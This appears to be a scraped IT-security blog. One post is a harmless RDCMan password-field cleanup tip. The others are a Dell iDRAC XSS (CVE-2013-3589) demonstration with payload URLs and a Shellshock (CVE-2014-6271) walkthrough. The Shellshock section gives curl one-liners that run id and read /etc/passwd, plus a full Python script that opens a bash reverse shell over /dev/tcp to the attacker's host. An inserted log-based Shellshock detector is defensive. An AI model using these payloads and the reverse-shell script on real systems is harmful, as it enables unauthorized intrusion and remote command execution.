I recently upgraded Remote Desktop Connection Manager (RDCMan) 2.2 to version 2.7. When I open the .rdg file, I get this giant popup window:
Because the file has so many hosts with encrypted passwords, the error window is larger than the screen. I couldn't even get to the "OK" button.
To fix this issue, remove each <password>...</password> element from the .rdg file.
1) Back up the file first; you should make a copy before opening the .rdg file with version 2.7.
2) Open the .rdg file with Notepad++. Press Ctrl+H to open the "Replace" dialog.
---Find what: <password>.*</password>
---Replace with: null (i.e. leave the field empty)
---Search mode: Regular expression
This works because each <password> element sits on its own line and "." does not match a line break; if the file has been reflowed so that several hosts share one line, the greedy ".*" would delete everything between the first and last password on that line, so check the result before saving.
3) Click the "Replace All" button and save the file.
4) Open it with RDCMan 2.7: no popup window anymore.
However, you will have to re-enter the passwords for these hosts.
Saturday, July 25, 2015
Thursday, March 19, 2015
How to verify CVE-2013-3589 (Dell iDRAC 6 and iDRAC 7 XSS Vulnerability)
1. Nessus description:
The remote Dell Remote Access Controller (iDRAC6 / iDRAC7) is affected by a cross-site scripting vulnerability. The login page does not properly sanitize user-supplied input to the 'ErrorMsg' parameter. An attacker could leverage this to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.
2. Demonstration:
2) Example 1: pop up a JavaScript window.
https://192.168.xxx.xxx/login.html?ErrorMsg=%3Cimg%20src=asdf%20onerror=alert%28%22XSS%22%29%3E
3) Example 2: redirect to https://google.com
https://192.168.xxx.xxx/login.html?ErrorMsg="><img src=x onerror=window.open('https://google.com/');>
3. Recommendation:
1) Upgrade to firmware version 1.96 (iDRAC6) / 1.46.45 (iDRAC7) or later.
4. References:
1) http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3589
2) http://www.tenable.com/plugins/index.php?view=single&id=70411
Monday, October 20, 2014
How to get reverse shell with BASH (shellshock) vulnerability?
Prerequisites:
1. Kali Linux
3. If you are targeting an HTTPS site, change line 12 to conn = httplib.HTTPSConnection(sys.argv[1]). Here I save the script as "shellshocks.py".
4. Your Kali Linux IP
5. The vulnerable host IP
Steps
1. Run the command "nc -lvp 9999" to listen on port 9999; you can change the port number if you want.
2. Open another window and run command “python shellshocks.py 10.10.x.x /ucsm/isSamInstalled.cgi 172.16.x.x/9999”. 10.10.x.x is the vulnerable host. 172.16.x.x is my Kali Linux IP.
3. Now you can get the shell:
Some commands that can be used to verify Shellshock:
1. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" https://10.10.x.x/ucsm/isSamInstalled.cgi
2. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/cat /etc/passwd" https://10.10.x.x/ucsm/isSamInstalled.cgi
3. curl --insecure -A "X: () { :;}; echo; /bin/cat /etc/passwd; 2>&1; exit" https://10.10.x.x/ucsm/isSamInstalled.cgi
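A defensive counterpart to the verification commands above, added here as an example (it is not part of the original post): a small Python detector that parses web-server access-log lines in Apache Combined Log Format and flags any request whose User-Agent or Referer header opens with the bash function-definition prologue "() {" that every CVE-2014-6271 payload shares. The log lines are constructed for the example.

```python
import re

# Constructed sample access-log lines in Apache Combined Log Format (not taken
# from the original post). The first two carry the header-based Shellshock
# probes shown above; the third is an ordinary browser request.
SAMPLE_LOG = [
    '10.10.1.5 - - [20/Oct/2014:10:01:02 +0000] "GET /ucsm/isSamInstalled.cgi HTTP/1.1" '
    '200 312 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"',
    '10.10.1.5 - - [20/Oct/2014:10:01:09 +0000] "GET /ucsm/isSamInstalled.cgi HTTP/1.1" '
    '200 58 "-" "X: () { :;}; echo; /bin/cat /etc/passwd; 2>&1; exit"',
    '10.10.1.7 - - [20/Oct/2014:10:02:00 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

# Combined Log Format: client, ident, user, [timestamp], "request", status,
# size, "referer", "user-agent". Only the fields the detector needs are named.
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Every CVE-2014-6271 payload starts with the bash function-definition prologue
# "() {" (whitespace between the tokens is optional), whatever command follows.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def parse_clf(line):
    """Return the parsed fields of one log line, or None if it is not CLF."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(lines):
    """Return one record per request whose User-Agent or Referer carries the prologue."""
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"src": rec["src"], "ts": rec["ts"], "path": rec["path"],
                             "status": int(rec["status"]), "field": field})
                break  # one alert per request is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print("Shellshock probe from %(src)s at %(ts)s against %(path)s (%(field)s, HTTP %(status)d)" % hit)
```

Feed real log lines to find_shellshock_attempts() to get the same records; a hit against a CGI path that answered 200 is the one to triage first.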
Appendix: the source code (from http://pastebin.com/166f8Rjx)
#
# CVE-2014-6271 cgi-bin reverse shell
#
import httplib, urllib, sys

if len(sys.argv) < 4:
    # The argument placeholders on this line were lost in the HTML export;
    # they are reconstructed here from the example that follows.
    print "Usage: %s <host> <cgi-path> <ip>/<port>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

# For an HTTPS target, the post says to change this to httplib.HTTPSConnection.
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell = "() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
# The payload is sent in a custom "test" header; the CGI environment passes it to bash.
headers = {"Content-type": "application/x-www-form-urlencoded",
           "test": reverse_shell}
conn.request("GET", sys.argv[2], headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data